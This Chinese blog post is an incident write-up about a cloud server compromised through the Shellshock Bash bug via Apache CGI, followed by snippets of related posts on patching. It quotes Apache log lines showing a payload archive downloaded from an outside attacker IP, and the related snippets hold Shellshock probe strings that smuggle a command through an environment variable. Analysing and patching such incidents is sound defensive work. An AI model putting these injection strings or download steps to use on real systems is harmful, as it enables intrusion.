黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!

问题描述:

公司的某产品服务器(阿里云的)被黑客攻击了,确切的说是被黑客当成肉鸡了.

肉鸡:肉鸡也称傀儡机,是指被黑客通过各种方式植入木马病毒,然后被远程操纵的机器,

肉鸡可以是各种系统,如windows,linux和unix等,可以是一家公司,企业和学校甚至是政府军队的服务器。

发现问题:

阿里云管理中心给公司领导发短信了(阿里云账号绑定了手机号),短信说你的x服务器存在恶意攻击,

登陆阿里云管理中心发现x服务器有很多风险,如下图:

分析这些风险发现,x服务器向网络内很多服务器发送了暴力破解破解密码的请求.

登陆x服务器,执行ps -ef指令发现有很多httpd进程:

daemon   11821  5748  0 12:01 ?        00:00:00 /usr/sbin/httpd

记得上次被攻击,执行ps -ef指令发现有很多sshd进程:

daemon   11821  5748  0 12:01 ?        00:00:00 /usr/sbin/sshd

综上得知:x服务器被当做肉鸡了.但是黑客是通过什么方式将木马病毒植入的x服务器的?

解决思路:

上次被黑客攻击,分析可能是通过tomcat,即黑客通过tomcat破解tomcat-user,然后登陆tomcat主页上传木马病毒.

当时的解决方案是将tomcat-user.xml文件删除了.但是时隔一个月,x服务器又被攻击了,所以排除了tomcat-user的问题,

但是无论如何,必须找出问题根源.仔细想了想x服务器上的服务主要是是apache和tomcat,如果不是tomcat,那可能就是apache.

于是将tomcat和apache最近两天的日志全部拷贝出来,认真分析,在apache的error日志中得到如下关键性输出(只复制一小部分):

[Tue Jan 13 02:28:47 2015] [error] [client 5.39.86.39] File does not exist: /opt/httpd-2.2.21/htdocs/cgi-sys

[Tue Jan 13 02:28:48 2015] [error] [client 5.39.86.39] File does not exist: /opt/httpd-2.2.21/htdocs/cgi-sys

[Tue Jan 13 02:28:48 2015] [error] [client 5.39.86.39] --2015-01-13 02:28:48--  http://88.208.200.143/css/.logo.gif/nynew.tar

[Tue Jan 13 02:28:48 2015] [error] [client 5.39.86.39] Connecting to 88.208.200.143:80...

[Tue Jan 13 02:28:48 2015] [error] [client 5.39.86.39] connected.

[Tue Jan 13 02:28:48 2015] [error] [client 5.39.86.39] HTTP request sent, awaiting response...

[Tue Jan 13 02:28:49 2015] [error] [client 5.39.86.39] 200 OK

日志的大概意思是:黑客通过apache的cgi将木马病毒植入到x服务器,主要过程是从88.208.200.143服务器上下载nynew.tar木马文件,

其中nynew.tar文件存放的是一些log文件(包括ip文件,用户名和密码文件)和一些脚本文件(进行http和ssh),可以登陆服务器通过find / nynew.tar指令搜索这个文件.

问题找到了,但是现在还有一个问题:就是黑客是如何通过apache的cgi将木马病毒植入到x服务器中?在网上找了一些资料发现如下线索:

In Linux, environment variables provide a way to influence the behavior of software on the system.

They typically consists of a name which has a value assigned to it.

The same is true of the Bash shell. It is common for a lot of programs to run Bash shell in the background.

It is often used to provide a shell to a remote user (via ssh, telnet, for example),

provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)

说来说去就是黑客可能通过bash的漏洞借助apache的cgi将木马病毒植入到x服务器,终于真相大白了,原来是bash的问题.

那么黑客是如何通过bash的漏洞借助apache的cgi将木马病毒植入到x服务器中的?这tmd我就不知道了,我又不是做安全的,上网百度下吧!

辅助资料:

在网上无意找到了关于阿里云官方发给阿里云服务器用户的通知,登陆阿里云服务器管理中心,发现9月25日确实收到了此通知,

可能领导没有看到,或者没有意识到问题的严重性,通知中有如下内容:

【已确认被成功利用的软件及系统】

所有安装GNU bash 版本小于或者等于4.3的Linux操作系统.

查看x服务器的bash版本,发现是4.1.5,真相更加大白了.

# bash -version

GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)

Copyright (C) 2009 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

补充:上网简单查了下,原来9月25日发生了2014年全球14大网络安全事件之一:Shellshock漏洞事件,而我却浑然不知,以后要多多关注安全方面的问题.

另外,阿里云针对不同类型的linux系统给出了相应的解决方案,参考通知中修补方案参考论坛.<linux bash严重漏洞通知>如下:

解决方案:

通过find / nynew.tar搜索木马文件,全部删除,然后升级bash版本.

补充:可以对apache进行优化...

最后对Mr chen的技术支持表示由衷的感谢,感谢你在工作的时间为我分析问题发生的根源,浪费了你很多宝贵的时间!有时间请你吃饭吧!

时间: 2024-10-13 05:02:48

黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!的相关文章

Linux“Bash”漏洞大爆发

9月25日,国外曝出一个“毁灭级”的Bash漏洞,黑客可利用此漏洞远程执行任意命令,完全控制目标系统! 该漏洞编号为CVE-2014-6271,主要存在于bash 1.14 - 4.3版本中,受影响的系统包括:Red Hat企业Linux (versions 4-7) .Fedora distribution.CentOS (versions 5-7).Ubuntu 10.04 LTS,12.04LTS和14.04 LTS.Debian等. 经验证,受此Bash漏洞影响最大的是网站和企业内网,以

Linux Bash 漏洞最终解决方案

距24日报出Bash漏洞以来,Linux 系列相关已于25日给出了相关补丁,可是当天又出现问题,故需要重新打补丁:在机器上执行 yum -y update bash  之后,可通过以下命令来测试是否真正完成了补丁升级,系统处于安全层面: env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo s\ ls 如果你的系统显示 系统时间 , 说明尚未脱离危险期,请升级 bash , 如下图: 如果显示为 date , 那么恭喜你,你的系统已经安全,如

高危bash漏洞来袭,小心你的服务器!

背景: 北京时间9月25日消息,Linux用户今天又得到了一个"惊喜"!Red Hat安全团队在 Linux 中广泛使用的Bash shell中发现了一个隐晦而危险的安全漏洞.该漏洞被称为"Bash Bug"或"Shellshock". 当用户正常访问,该漏洞允许攻击者的代码像在Shell中一样执行,这就为各种各样的攻击打开了方便之门.而且,更糟糕的是,该漏洞已经在Linux中存在很长时间了,所以修补某个Linux机器很容易,但是要全部修补,几乎

Linux bash 漏洞修补

如果返回下列结果表示存在bash 安全威胁 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test 补丁修复了这个缺陷,确保bash函数的尾部不允许额外的代码.所以如果你用打过补丁的bash版本运行上面这个例子,应该得到类似这样的输出: $ env x='() { :;}; echo vulnerable' bash -c "echo this is

linux bash漏洞新消息

2014-09-25 bash爆新漏洞 Bash 远程任意代码执行安全漏洞(最严重漏洞) 补救措施: yum -y update  bash /sbin/ldconfig 升级bash到4.1.2. 执行/sbin/ldconfig无需重启服务器 详情看红帽官网

Linux Bash严重漏洞修复方法

bash 是一个为GNU计划编写的Unix shell.:Bourne-Again SHell - 这是关于Bourne shell(sh)的一个双关语(Bourne again / born again).Bourne shell是一个早期的重要shell,由史蒂夫·伯恩在1978年前后编写,并Version 7 Unix一起发布.bash则在1987年由布莱恩·福克斯创造.在1990年,Chet Ramey成为了主要的维护者. shell在linux系统所处的位置: 常见linux和UNIX

Linux Bash严重漏洞修复紧急通知(官方最新解决方案持续更新中)

日前Linux官方内置Bash中新发现一个非常严重安全漏洞(漏洞参考https://access.redhat.com/security/cve/CVE-2014-6271  ),黑客可以利用该Bash漏洞完全控制目标系统并发起攻击,为了避免您Linux服务器受影响,建议您尽快完成漏洞修补,修复方法如下,请了解!  特别提醒:Linux 官方已经给出最新解决方案,已经解决被绕过的bug,建议您尽快重新完成漏洞修补.openSUSE 镜像暂时还没有给出.   [已确认被成功利用的软件及系统]  所

Linux Bash安全漏洞修复

1.影响的系统包括 Centos Debian Redhat Ubuntu 2.检查系统是否要修复 [[email protected] ~]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"vulnerablethis is a test[[email protected] ~]# 如果输出以上结果表示需要修复bash漏洞 3.修复漏洞 [[email protected] ~]# yum update

Bash漏洞批量检测工具与修复方案

&amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" title="shellshock-bug-bash-bashbug-938x535.jpg"/&amp;amp;gt;&amp;amp;lt;/strong&amp;amp;gt;&amp;amp;lt;/span&amp;amp;gt;&a